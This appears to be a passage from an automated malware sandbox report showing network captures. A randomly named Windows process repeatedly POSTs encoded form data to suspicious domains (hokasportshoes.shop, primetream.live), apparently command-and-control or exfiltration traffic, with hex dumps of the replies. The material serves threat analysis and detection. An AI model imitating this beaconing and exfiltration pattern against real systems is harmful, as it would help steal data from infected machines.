                                                                                                                     Dec 24, 2024 11:36:37.923439026 CET | 595 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDA1MzQ2ZTQtMDlhMS00MDE5LTk1NTAtNjlkOTljM2Q4MDI3IiwicGFnZV90aW1lIjoxNzM1MDM2NT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49812 | 199.59.243.227 | 80 | 1228 | C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 24, 2024 11:36:39.505783081 CET | 10808 | OUT | POST /vupi/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.hokasportshoes.shop
Origin: http://www.hokasportshoes.shop
Referer: http://www.hokasportshoes.shop/vupi/
Connection: close
Content-Length: 10304
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 65 6f 51 66 4e 52 39 7a 4d 44 37 63 30 4e 37 39 62 6d 31 47 51 4c 76 56 32 64 48 52 34 78 30 31 7a 6e 6c 6f 44 38 2b 51 53 6d 79 56 35 75 7a 73 68 64 33 49 53 70 37 51 52 61 4c 6e 57 43 63 6b 43 4f 6d 41 73 64 64 30 6f 64 76 62 46 51 44 6e 6d 47 75 79 38 4f 4d 30 6f 54 6c 34 77 37 73 79 39 56 50 64 6f 2f 77 57 55 50 75 61 30 46 5a 48 41 6d 38 64 79 6d 6a 6a 6a 32 71 41 65 32 2b 39 73 32 61 43 50 6a 45 32 78 6a 43 2f 4b 32 65 2f 4f 43 4c 30 30 68 59 55 67 4f 76 76 6e 72 53 66 56 49 43 44 6e 7a 49 73 5a 34 49 52 6e 61 4f 5a 54 65 35 34 2b 62 34 66 61 65 6a 72 38 66 59 61 2f 42 2f 68 65 68 56 33 5a 38 50 30 6a 76 57 68 36 4b 50 69 69 6e 50 64 79 4e 53 70 30 71 47 66 47 45 76 47 64 75 64 55 63 4f 6a 69 4c 41 41 35 45 46 57 55 6d 45 31 74 67 61 37 2f 42 54 34 6b 32 7a 6d 64 2b 74 7a 4a 62 33 31 41 36 63 4e 48 56 44 6e 47 74 2f 32 5a 79 76 4d 43 73 6c 6a 51 42 67 6d 64 61 67 6c 55 67 56 49 37 47 33 4b 6a 46 48 4d 75 35 43 41 75 77 6b 78 6b 4d 74 65 35 2f 30 31 57 71 53 76 45 53 6e [TRUNCATED]
                                                                                                                    Data Ascii: APatc2S=eoQfNR9zMD7c0N79bm1GQLvV2dHR4x01znloD8+QSmyV5uzshd3ISp7QRaLnWCckCOmAsdd0odvbFQDnmGuy8OM0oTl4w7sy9VPdo/wWUPua0FZHAm8dymjjj2qAe2+9s2aCPjE2xjC/K2e/OCL00hYUgOvvnrSfVICDnzIsZ4IRnaOZTe54+b4faejr8fYa/B/hehV3Z8P0jvWh6KPiinPdyNSp0qGfGEvGdudUcOjiLAA5EFWUmE1tga7/BT4k2zmd+tzJb31A6cNHVDnGt/2ZyvMCsljQBgmdaglUgVI7G3KjFHMu5CAuwkxkMte5/01WqSvESnhNks5/RtPmDriiI84KWw01Lc/CmhyKW347DL2KY6hn4F61Bir9kd0/yizyYWNj9f9FdvvD5ZQPFrPL3wo3bL7u2bD2nsLB2i8s56bmP0EgafC8nFtFftRNVNkB4ZdXktaxJvUMSatqQlcKWpp7ouev8cNicvOoqRmbgVAllMv1+1iynM1arZqpplOyUT3ER1faOznPAigANxvOSYr6y8MbdCaDE6hG05USWpy3Cx89eRKxZd6yuf5y3yoV0yRE5QRYwndZ34eI137hlNMSWsmNWcupeUHZT4eoUgzW10kwCTDOMdYIYpkUY1QrM/LLpKcwLvlHU1sEciMKPQ57izbWA7HdXB1S+4RpjJ0X7UEECYkY4+41aJnoXt18g9Bjx/knwZBqa0FgSSZtt20Ck/Ve8sUjnzigc6Y12aDV3tP1DlEh8ewVxDlLzdJMTkFYk1jWmi6doxQLhXwNyckYLsKi3FwWieqXqh8g71wTUqrF7PissQ2A5m/SCTBsxm2cpg51naFLjK7R66QZyFJtzhno/rqVl+lBhA1Tbtg2VWnMrG1RL/KH8V7QLejQB2pZk6IuqBXMoSz2tMGqy0EGBvkN5kVawuT70c1I2H0zJKnsAibUwQh96kqtpQFm4oW8j7rmQs1V3PfNGF/1mzrkxzvNfgbUsHYXwLKz [TRUNCATED]
Dec 24, 2024 11:36:40.604724884 CET | 1236 | IN | HTTP/1.1 200 OK
date: Tue, 24 Dec 2024 10:36:39 GMT
content-type: text/html; charset=utf-8
content-length: 1142
x-request-id: a64ab159-6607-4e30-be2c-60740607edd7
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yCaF1QEFXu0Z5y8bGWEEJrL2+VPxGe29vkdocIIjGBzzqX+qr01lz1nPyCYFLSHQpSL6tj27364CGoVoW2UjAw==
set-cookie: parking_session=a64ab159-6607-4e30-be2c-60740607edd7; expires=Tue, 24 Dec 2024 10:51:40 GMT; path=/
connection: close
                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 79 43 61 46 31 51 45 46 58 75 30 5a 35 79 38 62 47 57 45 45 4a 72 4c 32 2b 56 50 78 47 65 32 39 76 6b 64 6f 63 49 49 6a 47 42 7a 7a 71 58 2b 71 72 30 31 6c 7a 31 6e 50 79 43 59 46 4c 53 48 51 70 53 4c 36 74 6a 32 37 33 36 34 43 47 6f 56 6f 57 32 55 6a 41 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yCaF1QEFXu0Z5y8bGWEEJrL2+VPxGe29vkdocIIjGBzzqX+qr01lz1nPyCYFLSHQpSL6tj27364CGoVoW2UjAw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Dec 24, 2024 11:36:40.604790926 CET | 595 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTY0YWIxNTktNjYwNy00ZTMwLWJlMmMtNjA3NDA2MDdlZGQ3IiwicGFnZV90aW1lIjoxNzM1MDM2Nj


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49820 | 199.59.243.227 | 80 | 1228 | C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 24, 2024 11:36:42.157037973 CET | 428 | OUT | GET /vupi/?APatc2S=Tq4/OmBpIxnnwNjJag9TFYyv8dvb/Sss2ypRVdq0cF+rzvKYwtC+P6jcfpXxbnkAS7eQgKkM8sOtTzDV8Gz3yNosqQRn5vos9Tvg5+UIPuaa+2ZkNRQX8Ww=&3FNHL=wVCtFrFXof HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.hokasportshoes.shop
Connection: close
User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
Dec 24, 2024 11:36:43.245138884 CET | 1236 | IN | HTTP/1.1 200 OK
date: Tue, 24 Dec 2024 10:36:42 GMT
content-type: text/html; charset=utf-8
content-length: 1486
x-request-id: 298065e6-8873-4ff4-9bee-24463136be8f
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VPotO9wlW9rXBKmNqwrr1ld0ipI2DMeEIYrVFav75wqfhA4ST7j3TaytRVZaA/dSYa3CCvFRgB/U6wIlioL2nQ==
set-cookie: parking_session=298065e6-8873-4ff4-9bee-24463136be8f; expires=Tue, 24 Dec 2024 10:51:43 GMT; path=/
connection: close
                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 50 6f 74 4f 39 77 6c 57 39 72 58 42 4b 6d 4e 71 77 72 72 31 6c 64 30 69 70 49 32 44 4d 65 45 49 59 72 56 46 61 76 37 35 77 71 66 68 41 34 53 54 37 6a 33 54 61 79 74 52 56 5a 61 41 2f 64 53 59 61 33 43 43 76 46 52 67 42 2f 55 36 77 49 6c 69 6f 4c 32 6e 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VPotO9wlW9rXBKmNqwrr1ld0ipI2DMeEIYrVFav75wqfhA4ST7j3TaytRVZaA/dSYa3CCvFRgB/U6wIlioL2nQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Dec 24, 2024 11:36:43.245212078 CET | 939 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjk4MDY1ZTYtODg3My00ZmY0LTliZWUtMjQ0NjMxMzZiZThmIiwicGFnZV90aW1lIjoxNzM1MDM2Nj


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49836 | 162.0.236.169 | 80 | 1228 | C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 24, 2024 11:36:48.820530891 CET | 694 | OUT | POST /8t9s/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.primetream.live
Origin: http://www.primetream.live
Referer: http://www.primetream.live/8t9s/
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 52 53 6d 79 52 32 6b 45 64 62 62 48 6e 54 42 52 53 32 4b 5a 35 4a 31 47 63 37 57 64 4e 4f 5a 75 74 57 76 42 4d 53 73 37 5a 74 43 50 33 6b 5a 41 35 73 55 48 6e 71 36 62 77 42 74 32 57 46 6f 2f 78 47 2f 33 62 62 4e 54 45 6a 37 55 2f 6c 53 49 62 2f 37 6d 62 77 5a 49 54 55 6a 45 65 55 4b 4c 59 42 72 46 74 4c 4c 63 62 5a 6d 6a 78 38 4c 38 4e 5a 36 56 57 61 47 55 5a 31 50 58 42 63 76 31 46 41 69 43 48 31 38 6f 68 46 6e 4c 75 61 61 36 78 33 2f 49 6d 59 4c 47 6f 56 62 6a 30 78 67 48 46 70 31 59 59 48 56 74 47 5a 6e 6c 4f 54 59 32 47 66 46 4b 68 66 54 5a 51 51 52 76 69 54 45 50 74 67 3d 3d
                                                                                                                    Data Ascii: APatc2S=RSmyR2kEdbbHnTBRS2KZ5J1Gc7WdNOZutWvBMSs7ZtCP3kZA5sUHnq6bwBt2WFo/xG/3bbNTEj7U/lSIb/7mbwZITUjEeUKLYBrFtLLcbZmjx8L8NZ6VWaGUZ1PXBcv1FAiCH18ohFnLuaa6x3/ImYLGoVbj0xgHFp1YYHVtGZnlOTY2GfFKhfTZQQRviTEPtg==
Dec 24, 2024 11:36:50.059297085 CET | 533 | IN | HTTP/1.1 404 Not Found
Date: Tue, 24 Dec 2024 10:36:49 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49842 | 162.0.236.169 | 80 | 1228 | C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 24, 2024 11:36:51.489953041 CET | 714 | OUT | POST /8t9s/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.primetream.live
Origin: http://www.primetream.live
Referer: http://www.primetream.live/8t9s/
Connection: close
Content-Length: 224
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 52 53 6d 79 52 32 6b 45 64 62 62 48 6c 7a 78 52 64 32 32 5a 2f 70 31 46 51 62 57 64 47 75 5a 71 74 57 7a 42 4d 54 70 6a 61 65 32 50 77 46 70 41 34 74 55 48 67 71 36 62 6c 78 74 7a 4a 56 70 78 78 47 43 4b 62 65 6c 54 45 6a 76 55 2f 6e 36 49 62 4d 44 70 62 67 5a 4b 62 30 6a 47 52 30 4b 4c 59 42 72 46 74 4c 4f 35 62 5a 2b 6a 78 74 37 38 4e 34 36 61 62 36 47 58 65 31 50 58 46 63 76 78 46 41 6a 6e 48 30 68 4e 68 48 76 4c 75 61 71 36 77 6c 58 4c 6f 6f 4c 45 73 56 61 56 6e 79 56 50 44 4b 38 35 61 47 74 38 4e 63 44 70 47 31 56 73 58 75 6b 64 7a 66 33 71 4e 58 59 62 76 51 35 47 32 6c 36 51 6c 6b 33 54 75 70 33 6f 44 49 58 2b 31 4c 79 30 63 4d 67 3d
                                                                                                                    Data Ascii: APatc2S=RSmyR2kEdbbHlzxRd22Z/p1FQbWdGuZqtWzBMTpjae2PwFpA4tUHgq6blxtzJVpxxGCKbelTEjvU/n6IbMDpbgZKb0jGR0KLYBrFtLO5bZ+jxt78N46ab6GXe1PXFcvxFAjnH0hNhHvLuaq6wlXLooLEsVaVnyVPDK85aGt8NcDpG1VsXukdzf3qNXYbvQ5G2l6Qlk3Tup3oDIX+1Ly0cMg=
Dec 24, 2024 11:36:52.706269979 CET | 533 | IN | HTTP/1.1 404 Not Found
Date: Tue, 24 Dec 2024 10:36:52 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49850 | 162.0.236.169 | 80 | 1228 | C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 24, 2024 11:36:54.147028923 CET | 10796 | OUT | POST /8t9s/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.primetream.live
Origin: http://www.primetream.live
Referer: http://www.primetream.live/8t9s/
Connection: close
Content-Length: 10304
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 52 53 6d 79 52 32 6b 45 64 62 62 48 6c 7a 78 52 64 32 32 5a 2f 70 31 46 51 62 57 64 47 75 5a 71 74 57 7a 42 4d 54 70 6a 61 66 4f 50 77 32 78 41 35 4f 4d 48 68 71 36 62 35 68 74 79 4a 56 6f 74 78 47 71 4f 62 65 6f 75 45 6c 72 55 2b 47 61 49 5a 39 44 70 55 67 5a 4b 58 55 6a 46 65 55 4c 54 59 42 37 42 74 4c 65 35 62 5a 2b 6a 78 75 54 38 45 4a 36 61 5a 36 47 55 5a 31 50 6c 42 63 76 5a 46 45 47 61 48 30 6b 34 39 6a 6a 4c 70 36 36 36 39 32 2f 4c 75 34 4c 43 72 56 61 64 6e 79 4a 41 44 4a 49 54 61 47 4a 57 4e 61 2f 70 43 44 67 6c 49 65 59 5a 6c 2b 58 56 52 6d 5a 2b 75 6a 6c 34 76 6d 36 6e 30 45 44 47 39 71 50 74 44 66 71 74 79 6f 2b 6f 64 59 48 68 30 78 78 37 59 45 77 64 70 39 36 66 38 66 31 66 44 39 45 6d 70 6f 50 55 55 6f 33 6b 67 58 4e 30 32 45 52 75 45 59 6a 55 78 51 4d 50 48 31 69 61 55 6e 62 68 66 54 66 49 6d 57 7a 31 54 44 32 54 52 33 62 69 69 74 4f 33 6c 58 48 36 4c 32 4c 66 54 68 37 59 39 36 50 66 73 44 62 4f 6d 69 36 39 37 54 67 43 38 65 34 30 70 4f 41 31 35 77 75 6a 66 72 [TRUNCATED]
                                                                                                                    Data Ascii: APatc2S=RSmyR2kEdbbHlzxRd22Z/p1FQbWdGuZqtWzBMTpjafOPw2xA5OMHhq6b5htyJVotxGqObeouElrU+GaIZ9DpUgZKXUjFeULTYB7BtLe5bZ+jxuT8EJ6aZ6GUZ1PlBcvZFEGaH0k49jjLp66692/Lu4LCrVadnyJADJITaGJWNa/pCDglIeYZl+XVRmZ+ujl4vm6n0EDG9qPtDfqtyo+odYHh0xx7YEwdp96f8f1fD9EmpoPUUo3kgXN02ERuEYjUxQMPH1iaUnbhfTfImWz1TD2TR3biitO3lXH6L2LfTh7Y96PfsDbOmi697TgC8e40pOA15wujfr8raCFwoJsuS0VN604YX6g+w/9GgmO8Gh8qLzNETgTm2/zgG1cyLjo9j269KkgauSIQwggFQQdQFuYZiMEIUUSkYmspvVkFG/diOJ3XxM0BHEFSwJsamZFiqImaTrksN7xTZvHr2EObH3sk1UcRTNKlEz+fQSZkp49DIh782KgZs5L4wE4ImUR6nNtVm2tYV3CkZvVdryWbqRgl02Uz9nArIePaRSR6aFHmEEobA0La7OiyMvFhWdimlDfuTdp6UHw8SphevyO6Swb2Q57XLOKvrQDBKceh21vkASrvkIbjv9xU/0deFhemsgOsGs+0SQsKBA60z4vV4ze3UiqsAiS5cm5BUukmqbDpYmA/Ge5AVzQ8zZ0bb9p58VKNqBhVHpG9axCQ2axwAsMmpWy42QQ9F3s0X11TaygXPvLM99/NlyTe2ZgQ6ixXY853J0fidTiQ8ZvcnXqIX7QeEVXKIFv1/SHMz3yVsYV70L3qqsJbQuMfinM4BOo+IyZ3RtlQYEQezwWhc627D3bDuBi5jltISYBYd6tljFV2pXnARV1aealgSdptPAtqXEXX7ywPK62TD+5JEbfrLSjeWii+v57JoMBdB2ZB00nMWgtsdsjjjf9k6NMft/z8qJgDk+o5auQfAl+AbE1zP/ug5IHHkCKJ7pgYVqoXioeM [TRUNCATED]
Dec 24, 2024 11:36:55.440538883 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Tue, 24 Dec 2024 10:36:55 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 389
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
